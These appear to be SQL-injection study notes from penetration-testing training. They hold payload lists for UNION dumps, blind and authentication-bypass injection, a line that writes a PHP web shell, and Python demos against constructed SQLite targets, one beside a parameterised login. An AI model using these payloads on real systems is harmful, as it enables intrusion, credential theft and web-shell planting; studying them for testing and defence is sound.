
Manual SQL Exploitation

Wisdom

https://github.com/swisskyrepo/PayloadsAllTheThings

Check encoding CAREFULLY. Online encoders encode differently from Burp Suite's Decoder (which characters get escaped, and whether a space becomes %20 or +), and sometimes one works, or works better, where the other does not.

Original:

High' UNION SELECT '<?php echo system($_GET["cmd"]);' INTO OUTFILE '/srv/http/cmd.php'; --

Vuln:

CyberChef

BurpSuite

10.2.1 - Initial Tests

Test these on every field

'
''
' OR 1=1
offsec' OR 1=1 -- //
';#---

10.2.2 - Identifying SQLi via error-based payloads

' OR 1=1 in (SELECT * FROM users) -- //
' or 1=1 in (SELECT password FROM users) -- //

UNION-Based payloads

Verify the exact number of columns (keep increasing the number until the response changes or errors; the last n that still succeeds is the column count)
https://infosecwriteups.com/hackthebox-control-51eac2b08a5a

' ORDER BY 1-- //
' ORDER BY 2-- //
' ORDER BY 3-- //

Enumerate the database with SQL UNION injection

%' UNION SELECT database(), user(), @@version, null, null -- //

Shift the functions into the right-most columns (column 1 is often an integer ID that the page never renders, so output placed there is not displayed)

' UNION SELECT null, null, database(), user(), @@version  -- //

Retrieve the current database's tables and columns from information_schema.columns

' union select null, table_name, column_name, table_schema, null from information_schema.columns where table_schema=database() -- //

Query to dump users table

' UNION SELECT null, username, password, description, null FROM users -- //
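Added example, not from the notes, that runs the whole UNION procedure above (column count, fingerprint, schema, dump) end to end. The target is a constructed in-memory SQLite database with a five-column search query, so the five-column payloads line up; SQLite stands in for MySQL so it runs offline, and the MySQL functions the notes use are named in the comments.

```python
import sqlite3


def build_target():
    """Constructed target: a product search plus the users table we want."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE products(id INTEGER PRIMARY KEY, name TEXT, price REAL,
                              vendor TEXT, sku TEXT);
        INSERT INTO products(name, price, vendor, sku) VALUES
            ('laptop', 999.0, 'acme', 'L-1'), ('mouse', 19.0, 'acme', 'M-1');
        CREATE TABLE users(id INTEGER PRIMARY KEY, username TEXT, password TEXT,
                           description TEXT, created TEXT);
        INSERT INTO users(username, password, description, created) VALUES
            ('offsec', 'lab', 'student account', '2024-01-01'),
            ('admin', 's3cret', 'administrator', '2024-01-02');
    """)
    return conn


def vulnerable_search(conn, term):
    """The injectable query: the search term is concatenated into LIKE '%...%'."""
    sql = ("SELECT id, name, price, vendor, sku FROM products "
           f"WHERE name LIKE '%{term}%'")
    return conn.execute(sql).fetchall()


def find_column_count(oracle, max_cols=20):
    """ORDER BY n probing: the first n that errors is one past the column count.
    MySQL says 'Unknown column N in order clause'; SQLite says the ORDER BY
    term is out of range. Either way the response differs from the n before."""
    for n in range(1, max_cols + 1):
        try:
            oracle(f"' ORDER BY {n}-- //")
        except sqlite3.OperationalError:
            return n - 1
    return None


def injected_rows(oracle, select_body):
    """Send a UNION payload and keep only the rows the injected SELECT added."""
    baseline = set(oracle(""))
    return [r for r in oracle(f"' UNION SELECT {select_body} -- //")
            if r not in baseline]


def fingerprint(oracle):
    # MySQL: database(), user(), @@version; SQLite only offers sqlite_version().
    return injected_rows(oracle, "null, null, sqlite_version(), null, null")[0][2]


def list_tables(oracle):
    # MySQL: table_name, column_name FROM information_schema.columns
    #        WHERE table_schema=database(); SQLite keeps its schema in sqlite_master.
    rows = injected_rows(oracle, "null, name, sql, type, null FROM sqlite_master")
    return sorted(r[1] for r in rows if r[3] == "table")


def dump_users(oracle):
    """The notes' final payload: the users table through the five columns."""
    return injected_rows(oracle,
                         "null, username, password, description, null FROM users")


if __name__ == "__main__":
    conn = build_target()
    oracle = lambda payload: vulnerable_search(conn, payload)
    print("columns:", find_column_count(oracle))
    print("version:", fingerprint(oracle))
    print("tables:", list_tables(oracle))
    for row in dump_users(oracle):
        print("user:", row)
```

Against a real target, `oracle` is the function that sends the HTTP request and returns the rows the page rendered. The shift-right advice above matters there because the application only displays some columns; SQLite's dynamic typing never complains about a string in the id column, so the example just leaves column 1 as null.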

10.2.3 - Blind SQL Injection

Testing for boolean-based SQLi
Append the payload to the parameter value at the end of the URL, starting with the closing ' (1=1 and 1=2 should give different responses)

http://192.168.50.16/blindsqli.php?user=offsec' AND 1=1 -- //

Time-Based SQLi

http://192.168.50.16/blindsqli.php?user=offsec' AND IF (1=1, sleep(3),'false') -- //

10.2.4 - Even more SQLi

Master list

';#---              // insert everywhere! Shoutout to xsudoxx!
admin' or '1'='1
' or '1'='1
" or "1"="1
" or "1"="1"--
" or "1"="1"/*
" or "1"="1"#
" or 1=1
" or 1=1 --
" or 1=1 -
" or 1=1--
" or 1=1/*
" or 1=1#
" or 1=1-
") or "1"="1
") or "1"="1"--
") or "1"="1"/*
") or "1"="1"#
") or ("1"="1
") or ("1"="1"--
") or ("1"="1"/*
") or ("1"="1"#
) or '1`='1-

Authentication bypass

'-'
' '
'&'
'^'
'*'
' or 1=1 limit 1 -- -+
'="or'
' or ''-'
' or '' '
' or ''&'
' or ''^'
' or ''*'
'-||0'
"-||0"
' || '1'='1';-- -
"-"
" "
"&"
"^"
"*"
'--'
"--"
'--' / "--"
" or ""-"
" or "" "
" or ""&"
" or ""^"
" or ""*"
or true--
" or true--
' or true--
") or true--
') or true--
' or 'x'='x
') or ('x')=('x
')) or (('x'))=(('x
" or "x"="x
") or ("x")=("x
")) or (("x"))=(("x
or 2 like 2
or 1=1
or 1=1--
or 1=1#
or 1=1/*
admin' --
admin' -- -
admin' #
admin'/*
admin' or '2' LIKE '1
admin' or 2 LIKE 2--
admin' or 2 LIKE 2#
admin') or 2 LIKE 2#
admin') or 2 LIKE 2--
admin') or ('2' LIKE '2
admin') or ('2' LIKE '2'#
admin') or ('2' LIKE '2'/*
admin' or '1'='1
admin' or '1'='1'--
admin' or '1'='1'#
admin' or '1'='1'/*
admin'or 1=1 or ''='
admin' or 1=1
admin' or 1=1--
admin' or 1=1#
admin' or 1=1/*
admin') or ('1'='1
admin') or ('1'='1'--
admin') or ('1'='1'#
admin') or ('1'='1'/*
admin') or '1'='1
admin') or '1'='1'--
admin') or '1'='1'#
admin') or '1'='1'/*
1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055
admin" --
admin';-- azer
admin" #
admin"/*
admin" or "1"="1
admin" or "1"="1"--
admin" or "1"="1"#
admin" or "1"="1"/*
admin" or 1=1 or ""="
admin" or 1=1
admin" or 1=1--
admin" or 1=1#
admin" or 1=1/*
admin") or ("1"="1
admin") or ("1"="1"--
admin") or ("1"="1"#
admin") or ("1"="1"/*
admin") or "1"="1
admin") or "1"="1"--
admin") or "1"="1"#
admin") or "1"="1"/*
1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055
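Added example, not from the notes: two constructed login implementations that entries from the list above defeat, beside a parameterised one they do not. Passwords are stored as md5 hashes because the last entry of the list UNION-injects a row whose hash is md5('1234') = 81dc9bdb52d04dc20036dbd8313ed055, which only works against an app that fetches the stored hash and compares it in code. Account names and passwords are made up.

```python
import hashlib
import sqlite3


def md5(s):
    return hashlib.md5(s.encode()).hexdigest()


def build_target():
    """Constructed users table; admin is row 1 so 'or 1=1' returns it first."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users(id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users(username, password) VALUES (?, ?)",
                     [("admin", md5("Str0ngAdminPass")), ("offsec", md5("lab"))])
    return conn


def login_concat(conn, username, password):
    """Pattern 1: both values concatenated. Username payloads such as
    admin' --  or  ' or 1=1 --  rewrite the WHERE clause. Hashing the password
    before concatenation only removes the password field as an entry point."""
    sql = (f"SELECT username FROM users WHERE username='{username}' "
           f"AND password='{md5(password)}'")
    row = conn.execute(sql).fetchone()
    return row[0] if row else None


def login_hash_compare(conn, username, password):
    """Pattern 2: the app fetches the stored hash and compares in code, so
    admin' --  alone fails (wrong hash), but a UNION row carrying an
    attacker-chosen hash logs in as whatever username that row contains."""
    sql = f"SELECT username, password FROM users WHERE username='{username}'"
    row = conn.execute(sql).fetchone()
    return row[0] if row and row[1] == md5(password) else None


def login_safe(conn, username, password):
    """Parameterised: the same strings are compared as data and match no user."""
    row = conn.execute("SELECT username FROM users WHERE username=? AND password=?",
                       (username, md5(password))).fetchone()
    return row[0] if row else None


# Entries from the list above, paired with the password sent alongside.
ATTEMPTS = [
    ("admin' --", "wrong"),
    ("' or 1=1 --", "wrong"),
    ("admin' or '1'='1", "wrong"),
    ("1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055", "1234"),
]


def run_attempts(conn, login):
    """Map each username payload to the account it logged in as, None for a
    failed login, or 'error' when the database rejected the query (a 500 page
    on a real target, and itself a sign the field is injectable)."""
    results = {}
    for user, pw in ATTEMPTS:
        try:
            results[user] = login(conn, user, pw)
        except sqlite3.Error:
            results[user] = "error"
    return results


if __name__ == "__main__":
    conn = build_target()
    for login in (login_concat, login_hash_compare, login_safe):
        print(login.__name__, run_attempts(conn, login))
```

The `#` and `/*` comment endings in the list are MySQL syntax; SQLite only understands `--`, so the example sticks to those entries. Which ending a target accepts is itself a fingerprint of the backend.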